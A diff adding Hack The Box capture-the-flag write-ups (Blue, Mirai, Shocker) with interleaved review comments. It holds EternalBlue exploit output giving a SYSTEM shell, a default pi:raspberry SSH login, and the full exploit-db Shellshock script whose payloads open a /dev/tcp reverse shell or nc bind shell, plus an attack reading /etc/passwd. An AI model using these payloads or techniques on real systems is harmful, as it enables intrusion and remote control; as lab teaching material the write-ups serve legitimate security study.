+ [+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
+ [*] 10.10.10.40:445 - Connecting to target for exploitation.
+ [+] 10.10.10.40:445 - Connection established for exploitation.
+ [+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
+ [*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
+ [*] 10.10.10.40:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
+ [*] 10.10.10.40:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
+ [*] 10.10.10.40:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
+ [+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
+ [*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
+ [*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
+ w[*] 10.10.10.40:445 - Starting non-paged pool grooming
+ h[+] 10.10.10.40:445 - Sending SMBv2 buffers
+ o[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
+ [*] 10.10.10.40:445 - Sending final SMBv2 buffers.
+ [*] 10.10.10.40:445 - Sending last fragment of exploit packet!
+ [*] 10.10.10.40:445 - Receiving response from exploit packet
+ [+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
+ [*] 10.10.10.40:445 - Sending egg to corrupted connection.
+ [*] 10.10.10.40:445 - Triggering free of corrupted buffer.
+ [*] Command shell session 1 opened (10.10.14.48:4444 -> 10.10.10.40:49158) at 2019-11-15 21:59:26 +0100
+ [+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+ [+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+ [+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+ C:\Windows\system32>whoami
+ whoami
+ nt authority\system
+
+
+It spawned us an elevated privilege shell ! Now all we have to do is to print out the user and root flags.
+
+
+ C:\Users\haris\Desktop>more user.txt
+ more user.txt
+ 4cXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+ C:\Users\Administrator\Desktop>more root.txt
+ more root.txt
+ ffXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
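Review bot: the exploitation steps in this hunk are incomplete as shown. The module output reports "Started reverse TCP handler on 10.10.14.48:4444", but nothing in the listing sets `LHOST` or a payload, and `set RHOSTS 10.10.10.40` appears twice (end of Part 2 and start of Part 3); show the `set LHOST`/`set PAYLOAD` lines once, or state that the defaults were used. Since `exploit/windows/smb/ms17_010_eternalblue` is ranked "average" and its description is "SMB Remote Windows Kernel Pool Corruption", the writeup should run the `auxiliary/scanner/smb/smb_ms17_010` check that its own search output lists before firing the exploit, and say that a failed attempt can blue-screen the target. "this CVE has been fixed with the MS17-010 patch" names no CVE; EternalBlue is CVE-2017-0144, one of the SMBv1 issues MS17-010 addresses. The captured output has stray keystrokes at the start of three lines (`w[*]`, `h[+]`, `o[+]`, the `whoami` typed while the exploit ran) that should be cleaned, and the flag reads jump to `C:\Users\haris\Desktop` and `C:\Users\Administrator\Desktop` without the `cd` commands that got there.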
diff --git a/Easy/12.md b/Easy/12.md
new file mode 100644
index 0000000..c8a8790
--- /dev/null
+++ b/Easy/12.md
@@ -0,0 +1,206 @@
+# Mirai Writeup
+
+
+
+## Introduction :
+
+Mirai is an easy linux box released back in September 2017. It features a misconfigured pi-hole service onto which the administrator seems to have deleted our precious root flag...
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → nmap -sC -sV 10.10.10.48
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-15 22:18 CET
+ Nmap scan report for 10.10.10.48
+ Host is up (0.058s latency).
+ Not shown: 997 closed ports
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
+ | ssh-hostkey:
+ | 1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
+ | 2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
+ | 256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
+ |_ 256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
+ 53/tcp open domain dnsmasq 2.76
+ | dns-nsid:
+ |_ bind.version: dnsmasq-2.76
+ 80/tcp open http lighttpd 1.4.35
+ |_http-server-header: lighttpd/1.4.35
+ |_http-title: Site doesnt have a title (text/html; charset=UTF-8).
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 17.22 seconds
+
+
+## **Part 2 : Getting User Access**
+
+Looking at our nmap results, we see that port 80 seems to be serving a lighthttp service. We could browse to the adress into our web browser, but for this example we will use the curl command.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → curl -vsk http://10.10.10.48/
+ * Trying 10.10.10.48:80...
+ * TCP_NODELAY set
+ * Connected to 10.10.10.48 (10.10.10.48) port 80 (#0)
+ > GET / HTTP/1.1
+ > Host: 10.10.10.48
+ > User-Agent: curl/7.67.0
+ > Accept: */*
+ >
+ * Mark bundle as not supporting multiuse
+ < HTTP/1.1 404 Not Found
+ < X-Pi-hole: A black hole for Internet advertisements.
+ < Content-type: text/html; charset=UTF-8
+ < Content-Length: 0
+ < Date: Fri, 15 Nov 2019 21:28:22 GMT
+ < Server: lighttpd/1.4.35
+ <
+ * Connection #0 to host 10.10.10.48 left intact
+
+
+We see that the box seems to be running a the Pi-Hole service, which is basically a DNS loophole to avoid getting ads. We can suppose that the box may have misconfigured his ssh, and perhaps left the default user and password. which could potentially be using th credentials **pi:raspberry**
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → ssh pi@10.10.10.48
+ pi@10.10.10.48's password:
+ Permission denied, please try again.
+ pi@10.10.10.48's password:
+
+ The programs included with the Debian GNU/Linux system are free software;
+ the exact distribution terms for each program are described in the
+ individual files in /usr/share/doc//copyright.
+
+ Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
+ permitted by applicable law.
+ Last login: Sun Aug 27 14:47:50 2017 from localhost
+
+ SSH is enabled and the default password for the 'pi' user has not been changed.
+ This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.
+
+
+ SSH is enabled and the default password for the 'pi' user has not been changed.
+ This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.
+
+ pi@raspberrypi:~ $ whoami
+ pi
+
+ pi@raspberrypi:~ $ uname -a
+ Linux raspberrypi 3.16.0-4-686-pae #1 SMP Debian 3.16.36-1+deb8u2 (2016-10-19) i686 GNU/Linux
+
+ pi@raspberrypi:~ $ cat /home/pi/Desktop/user.txt
+ ff837707441b257a20e32199d7c8838d
+
+
+Our assumptions have been confirmed, the box has left it's ssh service misconfigured, giving us a shell logged as the default user pi. Therefore allowing us to capture the user flag.
+
+## **Part 3 : Getting Root Access**
+
+In order to capture the root flag we will try to escalate privileges using the sudo -i command.
+
+
+ pi@raspberrypi:~ $ sudo -i
+
+ SSH is enabled and the default password for the 'pi' user has not been changed.
+ This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.
+
+
+ SSH is enabled and the default password for the 'pi' user has not been changed.
+ This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.
+
+ root@raspberrypi:~# whoami
+ root
+ root@raspberrypi:~# cat /root/root.txt
+ I lost my original root.txt! I think I may have a backup on my USB stick...
+
+
+We have been able to escalate privileges ! However the root flag seems to be elsewhere on a supposed usb stick. Let's see which external drives are mounted using the **mount** command.
+
+
+ root@raspberrypi:~# mount
+ sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
+ proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
+ tmpfs on /run type tmpfs (rw,nosuid,relatime,size=102396k,mode=755)
+ /dev/sda1 on /lib/live/mount/persistence/sda1 type iso9660 (ro,noatime)
+ /dev/loop0 on /lib/live/mount/rootfs/filesystem.squashfs type squashfs (ro,noatime)
+ tmpfs on /lib/live/mount/overlay type tmpfs (rw,relatime)
+ /dev/sda2 on /lib/live/mount/persistence/sda2 type ext4 (rw,noatime,data=ordered)
+ aufs on / type aufs (rw,noatime,si=f1429df6,noxino)
+ devtmpfs on /dev type devtmpfs (rw,nosuid,size=10240k,nr_inodes=58955,mode=755)
+ securityfs on /sys/kernel/security type securityfs (rw,nosuid,nodev,noexec,relatime)
+ tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
+ devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000)
+ tmpfs on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k)
+ tmpfs on /sys/fs/cgroup type tmpfs (ro,nosuid,nodev,noexec,mode=755)
+ cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,release_agent=/lib/systemd/systemd-cgroups-agent,name=systemd)
+ pstore on /sys/fs/pstore type pstore (rw,nosuid,nodev,noexec,relatime)
+ cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
+ cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpu,cpuacct)
+ cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
+ cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
+ cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio)
+ cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
+ cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
+ systemd-1 on /proc/sys/fs/binfmt_misc type autofs (rw,relatime,fd=22,pgrp=1,timeout=300,minproto=5,maxproto=5,direct)
+ debugfs on /sys/kernel/debug type debugfs (rw,relatime)
+ hugetlbfs on /dev/hugepages type hugetlbfs (rw,relatime)
+ mqueue on /dev/mqueue type mqueue (rw,relatime)
+ tmpfs on /tmp type tmpfs (rw,nosuid,nodev,relatime)
+
+ **/dev/sdb on /media/usbstick type ext4 (ro,nosuid,nodev,noexec,relatime,data=ordered)**
+ tmpfs on /run/user/999 type tmpfs (rw,nosuid,nodev,relatime,size=51200k,mode=700,uid=999,gid=997)
+ tmpfs on /run/user/1000 type tmpfs (rw,nosuid,nodev,relatime,size=51200k,mode=700,uid=1000,gid=1000)
+
+
+
+We seem to have a folder to work with : **/media/usbstick**
+
+
+ root@raspberrypi:~# cd /media/usbstick
+ root@raspberrypi:/media/usbstick# ls
+ damnit.txt lost+found
+ root@raspberrypi:/media/usbstick# cat damnit.txt
+ Damnit! Sorry man I accidentally deleted your files off the USB stick.
+ Do you know if there is any way to get them back?
+
+ -James
+
+
+
+Yet another troll ! Although we do know that we are on the /dev/sdb partition, we will use the **strings** command to list the previous commands that happenned on /dev/sdb and hopefully find a way to get to the root flag.
+
+
+ root@raspberrypi:/media/usbstick# strings /dev/sdb
+ >r &
+ /media/usbstick
+ lost+found
+ root.txt
+ damnit.txt
+ >r &
+ >r &
+ /media/usbstick
+ lost+found
+ root.txt
+ damnit.txt
+ >r &
+ /media/usbstick
+ 2]8^
+ lost+found
+ root.txt
+ damnit.txt
+ >r &
+ **3dXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX**
+ Damnit! Sorry man I accidentally deleted your files off the USB stick.
+ Do you know if there is any way to get them back?
+ -James
+
+
+And that's it ! We have finally found the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
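Review bot: the sentence introducing `strings /dev/sdb` misdescribes the technique; `strings` does not "list the previous commands that happened on /dev/sdb", it dumps every printable run from the raw block device, and the deleted root.txt shows up because ext4 unlinks the inode but leaves the data blocks in place until they are reused. Reword to that, and add that the stick is mounted `ro` (visible in the highlighted `mount` line), so nothing will be overwritten while carving; `strings -n 8 /dev/sdb` or `grep -a -o '[0-9a-f]\{32\}' /dev/sdb` narrows the dump to flag-shaped strings, and `extundelete`/`testdisk` are the tools when a whole file rather than one line has to come back. Smaller points: the paragraph never says why `sudo -i` works, and the listing shows no password prompt, so state the actual finding (pi has passwordless sudo); the `**...**` around the `/dev/sdb` mount line and around the flag render literally inside an indented code block, so drop them or switch the listing to a fenced block; "happenned" is a typo; and the "progress graph" paragraph has no image after it.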
diff --git a/Easy/13.md b/Easy/13.md
new file mode 100644
index 0000000..f89b708
--- /dev/null
+++ b/Easy/13.md
@@ -0,0 +1,523 @@
+# Shocker Writeup
+
+
+
+## Introduction :
+
+Shocker is an easy Linux Box released back in September 2017. It features the well known shellshock vulnerability.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → nmap 10.10.10.56 -sC -sV
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-16 10:12 CET
+ Nmap scan report for 10.10.10.56
+ Host is up (0.065s latency).
+ Not shown: 998 closed ports
+ PORT STATE SERVICE VERSION
+ 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
+ |_http-server-header: Apache/2.4.18 (Ubuntu)
+ |_http-title: Site doesnt have a title (text/html).
+ 2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
+ | 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
+ |_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 9.43 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap result tells us that port 80 seems to be serving an Apache httpd 2.4.18 service, let's see if we can dig in a little more information...
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → curl -vsk http://10.10.10.56/
+ * Trying 10.10.10.56:80...
+ * TCP_NODELAY set
+ * Connected to 10.10.10.56 (10.10.10.56) port 80 (#0)
+ > GET / HTTP/1.1
+ > Host: 10.10.10.56
+ > User-Agent: curl/7.67.0
+ > Accept: */ *
+ >
+ * Mark bundle as not supporting multiuse
+ < HTTP/1.1 200 OK
+ < Date: Sat, 16 Nov 2019 09:25:00 GMT
+ < Server: Apache/2.4.18 (Ubuntu)
+ < Last-Modified: Fri, 22 Sep 2017 20:01:19 GMT
+ < ETag: "89-559ccac257884"
+ < Accept-Ranges: bytes
+ < Content-Length: 137
+ < Vary: Accept-Encoding
+ < Content-Type: text/html
+ <
+ <****!DOCTYPE html> <****html> <****body> <****h2>Dont Bug Me!** h2>
+ <****img src="bug.jpg" alt="bug" style="width:450px;height:350px;"> <****/body> <****/html>
+ * Connection #0 to host 10.10.10.56 left intact
+
+Looking at the results , the URL http://10.10.10.56/ doesnt seem to yield that much results. Let's run the dirbusting command **dirb** to try to find out which directories are being hosted by the httpd service.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → dirb http://10.10.10.56/
+
+ -----------------
+ DIRB v2.22
+ By The Dark Raver
+ -----------------
+
+ START_TIME: Sat Nov 16 10:23:02 2019
+ URL_BASE: http://10.10.10.56/
+ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
+
+ -----------------
+
+ GENERATED WORDS: 4612
+
+ ---- Scanning URL: http://10.10.10.56/ ----
+ + http://10.10.10.56/cgi-bin/ (CODE:403|SIZE:294)
+ + http://10.10.10.56/index.md (CODE:200|SIZE:137)
+ + http://10.10.10.56/server-status (CODE:403|SIZE:299)
+
+ -----------------
+ END_TIME: Sat Nov 16 10:26:12 2019
+ DOWNLOADED: 4612 - FOUND: 3
+
+
+Dirbuster returned with 2 interesting results : /cgi-bin/ /server-status Although both of these seem to be returning the 403 Forbidden error. Let's see if we can find any good results within the /cgi-bin/ for example a .sh file, we will use dirbuster one more time using the common files txt wordlist.
+
+
+ λ root [ 10.10.14.48/23 ] [share/wordlists/dirb] → curl -vsk https://raw.githubusercontent.com/digination/dirbuster-ng/master/wordlists/common.txt > common.txt
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Shocker] → dirb http://10.10.10.56/cgi-bin/ -w /usr/share/dirb/common.txt -X .sh
+
+ -----------------
+ DIRB v2.22
+ By The Dark Raver
+ -----------------
+
+ START_TIME: Sat Nov 16 10:52:59 2019
+ URL_BASE: http://10.10.10.56/cgi-bin/
+ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
+ OPTION: Not Stoping on warning messages
+ EXTENSIONS_LIST: (.sh) | (.sh) [NUM = 1]
+
+ -----------------
+
+ GENERATED WORDS: 4612
+
+ ---- Scanning URL: http://10.10.10.56/cgi-bin/ ----
+ + http://10.10.10.56/cgi-bin/user.sh (CODE:200|SIZE:118)
+
+ -----------------
+ END_TIME: Sat Nov 16 10:56:07 2019
+ DOWNLOADED: 4612 - FOUND: 1
+
+
+Dirbuster found the user.sh file within the /cgi-bin/ folder ! Let's download it using the **wget** command, and print out it's content.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Shocker] → wget http://10.10.10.56/cgi-bin/user.sh
+ --2019-11-16 10:56:29-- http://10.10.10.56/cgi-bin/user.sh
+ Connecting to 10.10.10.56:80... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: unspecified [text/x-sh]
+ Saving to: ‘user.sh’
+
+ user.sh [ <=> ] 118 --.-KB/s in 0.001s
+
+ 2019-11-16 10:56:29 (195 KB/s) - ‘user.sh’ saved [118]
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Shocker] → cat user.sh
+ Content-Type: text/plain
+
+ Just an uptime test script
+
+ 04:58:44 up 2:11, 0 users, load average: 0.01, 0.00, 0.00
+
+
+
+This seems to ring a bell, this may in fact be the shellshock vulnerability ! We run a quick **searchsploit** to find which exploit number corresponds to the shellshock CVE.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Shocker] → searchsploit shellshock
+ ------------------------------------------------------------------------------ ----------------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ ------------------------------------------------------------------------------ ----------------------------------------
+ Advantech Switch - 'Shellshock' Bash Environment Variable Command Injection ( | exploits/cgi/remote/38849.rb
+ **Apache mod_cgi - 'Shellshock' Remote Command Injection | exploits/linux/remote/34900.py**
+ Bash - 'Shellshock' Environment Variables Command Injection | exploits/linux/remote/34766.php
+ Bash CGI - 'Shellshock' Remote Command Injection (Metasploit) | exploits/cgi/webapps/34895.rb
+ Cisco UCS Manager 2.1(1b) - Remote Command Injection (Shellshock) | exploits/hardware/remote/39568.py
+ GNU Bash - 'Shellshock' Environment Variable Command Injection | exploits/linux/remote/34765.txt
+ IPFire - 'Shellshock' Bash Environment Variable Command Injection (Metasploit | exploits/cgi/remote/39918.rb
+ NUUO NVRmini 2 3.0.8 - Remote Command Injection (Shellshock) | exploits/cgi/webapps/40213.txt
+ OpenVPN 2.2.29 - 'Shellshock' Remote Command Injection | exploits/linux/remote/34879.txt
+ PHP < 5.6.2 - 'Shellshock' Safe Mode / Disable Functions Bypass / Command Inj | exploits/php/webapps/35146.txt
+ Postfix SMTP 4.2.x < 4.2.48 - 'Shellshock' Remote Command Injection | exploits/linux/remote/34896.py
+ RedStar 3.0 Server - 'Shellshock' 'BEAM' / 'RSSMON' Command Injection | exploits/linux/local/40938.py
+ Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 - Command Inject | exploits/cgi/webapps/39887.txt
+ TrendMicro InterScan Web Security Virtual Appliance - 'Shellshock' Remote Com | exploits/hardware/remote/40619.py
+ dhclient 4.1 - Bash Environment Variable Command Injection (Shellshock) | exploits/linux/remote/36933.py
+ ------------------------------------------------------------------------------ ----------------------------------------
+ Shellcodes: No Result
+
+
+Seems like the exploit n° 34900 corresponds to the box that we have, Apache, mod_cgi, Shellshock let's run a quick locate and cp command to copy the script onto our current directory for further inspection.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Shocker] → locate 34900.py
+ /usr/share/exploitdb/exploits/linux/remote/34900.py
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Shocker] → cp /usr/share/exploitdb/exploits/linux/remote/34900.py .
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Shocker] → nano 34900.py
+
+
+Here is the official python script that we could be using :
+
+
+ #! /usr/bin/env python
+ from socket import *
+ from threading import Thread
+ import thread, time, httplib, urllib, sys
+
+ stop = False
+ proxyhost = ""
+ proxyport = 0
+
+ def usage():
+ print ("""
+ Usage : python2 exploit.py payload=reverse rhost= lhost= lport= pages=cgi-bin/user.sh
+ """)
+ sys.exit(0)
+
+ def exploit(lhost,lport,rhost,rport,payload,pages):
+ headers = {"Cookie": payload, "Referer": payload}
+
+ for page in pages:
+ if stop:
+ return
+ print ("[-] Trying exploit on : "+page)
+ if proxyhost != "":
+ c = httplib.HTTPConnection(proxyhost,proxyport)
+ c.request("GET","http://"+rhost+page,headers=headers)
+ res = c.getresponse()
+ else:
+ c = httplib.HTTPConnection(rhost)
+ c.request("GET",page,headers=headers)
+ res = c.getresponse()
+ if res.status == 404:
+ print( "[*] 404 on : "+page)
+ time.sleep(1)
+ args = {}
+
+
+ for arg in sys.argv[1:]:
+ ar = arg.split("=")
+ args[ar[0]] = ar[1]
+ try:
+ args['payload']
+ except:
+ usage()
+
+ if args['payload'] == 'reverse':
+ try:
+ lhost = args['lhost']
+ lport = int(args['lport'])
+ rhost = args['rhost']
+ payload = "() { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/"+lhost+"/"+str(lport)+" 0>&1 &"
+ except:
+ usage()
+
+ elif args['payload'] == "bind":
+ try:
+ rhost = args['rhost']
+ rport = args['rport']
+ payload = "() { :;}; /bin/bash -c 'nc -l -p "+rport+" -e /bin/bash &'"
+ except:
+ usage()
+ else:
+ print( "[*] Unsupported payload")
+ usage()
+ try:
+ pages = args['pages'].split(",")
+ except:
+ pass
+
+ if args['payload'] == 'reverse':
+ serversocket = socket(AF_INET, SOCK_STREAM)
+ buff = 1024
+ addr = (lhost,lport)
+ serversocket.bind(addr)
+ serversocket.listen(10)
+ print ("[!] Started reverse shell handler")
+ thread.start_new_thread(exploit,(lhost,lport,rhost,0,payload,pages,))
+ if args['payload'] == 'bind':
+ serversocket = socket(AF_INET, SOCK_STREAM)
+ addr = (rhost,int(rport))
+ thread.start_new_thread(exploit,("",0,rhost,rport,payload,pages,))
+
+ buff = 1024
+
+ while True:
+ if args['payload'] == 'reverse':
+ clientsocket, clientaddr = serversocket.accept()
+ print ("[!] Successfully exploited")
+ print ("[!] Incoming connection from "+clientaddr[0])
+ stop = True
+ clientsocket.settimeout(3)
+ while True:
+ reply = raw_input(clientaddr[0]+"> ")
+ clientsocket.sendall(reply+"\n")
+ try:
+ data = clientsocket.recv(buff)
+ print (data)
+ except:
+ pass
+
+ if args['payload'] == 'bind':
+ try:
+ serversocket = socket(AF_INET, SOCK_STREAM)
+ time.sleep(1)
+ serversocket.connect(addr)
+ print ("[!] Successfully exploited")
+ print ("[!] Connected to "+rhost)
+ stop = True
+ serversocket.settimeout(3)
+ while True:
+ reply = raw_input(rhost+"> ")
+ serversocket.sendall(reply+"\n")
+ data = serversocket.recv(buff)
+ print( data)
+ except:
+ pass
+
+
+If we wanted to execute the aforementionned python script, we would follow the syntax given in the script itself : **python2 34900.py payload=reverse rhost= lhost= lport= pages=cgi-bin/user.sh** Although we will go for another, more elaborate alternative which has been developped by [ncc group](https://github.com/nccgroup/shocker).
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Shocker] → wget https://raw.githubusercontent.com/nccgroup/shocker/master/shocker.py
+ --2019-11-16 11:28:02-- https://raw.githubusercontent.com/nccgroup/shocker/master/shocker.py
+ Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.120.133
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.120.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 17942 (18K) [text/plain]
+ Saving to: ‘shocker.py’
+
+ shocker.py 100%[===================================================================================================>] 17.52K --.-KB/s in 0.02s
+
+ 2019-11-16 11:28:02 (828 KB/s) - ‘shocker.py’ saved [17942/17942]
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Shocker] → python2 shocker.py
+
+ .-. . .
+ ( )| |
+ `-. |--. .-. .-.|.-. .-. .--.
+ ( )| |( )( |-.'(.-' |
+ `-' ' `-`-' `-'' `-`--' v1.1
+
+ Tom Watson, tom.watson@nccgroup.trust
+ https://www.github.com/nccgroup/shocker
+
+ Released under the GNU Affero General Public License
+ (https://www.gnu.org/licenses/agpl-3.0.html)
+
+
+ usage: shocker.py [-h] (--Host HOST | --file FILE)
+ [--cgilist CGILIST | --cgi CGI] [--port PORT]
+ [--command COMMAND] [--proxy PROXY] [--ssl]
+ [--threads THREADS] [--verbose] [--debug]
+ shocker.py: error: one of the arguments --Host/-H --file/-f is required
+
+
+As you can see it seems to have a simpler syntax for us to use. Let's test our second python script onto our target and see if we get any results. We will use the -H , --command, -c and --verbose flags.
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Shocker] → python2 shocker.py -H 10.10.10.56 --command "/bin/cat /etc/passwd" -c /cgi-bin/user.sh --verbose
+
+ .-. . .
+ ( )| |
+ `-. |--. .-. .-.|.-. .-. .--.
+ ( )| |( )( |-.'(.-' |
+ `-' ' `-`-' `-'' `-`--' v1.1
+
+ Tom Watson, tom.watson@nccgroup.trust
+ https://www.github.com/nccgroup/shocker
+
+ Released under the GNU Affero General Public License
+ (https://www.gnu.org/licenses/agpl-3.0.html)
+
+
+ [+] Single target '/cgi-bin/user.sh' being used
+ [+] Checking connectivity with target...
+ [I] Checking to see if 10.10.10.56 resolves...
+ [I] Resolved ok
+ [I] Checking to see if 10.10.10.56 is reachable on port 80...
+ [I] 10.10.10.56 seems reachable...
+ [+] Target was reachable
+ [+] Looking for vulnerabilities on 10.10.10.56:80
+ [I] Starting thread 1
+ [+] Finished host scan
+ [+] 1 potential target found, attempting exploits
+ [+] Trying exploit for http://10.10.10.56:80/cgi-bin/user.sh
+ [I] Flag set to: V74T37Z64S0NDC600N7U
+ [I] Header is: Content-type
+ [I] Attack string is: () { :;}; echo; echo V74T37Z64S0NDC600N7U; /bin/cat /etc/passwd
+ [!] http://10.10.10.56:80/cgi-bin/user.sh looks vulnerable
+ [!] Response returned was:
+
+ root:x:0:0:root:/root:/bin/bash
+ daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+ bin:x:2:2:bin:/bin:/usr/sbin/nologin
+ sys:x:3:3:sys:/dev:/usr/sbin/nologin
+ sync:x:4:65534:sync:/bin:/bin/sync
+ games:x:5:60:games:/usr/games:/usr/sbin/nologin
+ man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+ lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+ mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+ news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+ uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+ proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+ www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+ backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+ list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+ irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+ gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+ nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+ systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
+ systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
+ systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
+ systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
+ syslog:x:104:108::/home/syslog:/bin/false
+ _apt:x:105:65534::/nonexistent:/bin/false
+ lxd:x:106:65534::/var/lib/lxd/:/bin/false
+ messagebus:x:107:111::/var/run/dbus:/bin/false
+ uuidd:x:108:112::/run/uuidd:/bin/false
+ dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
+ sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
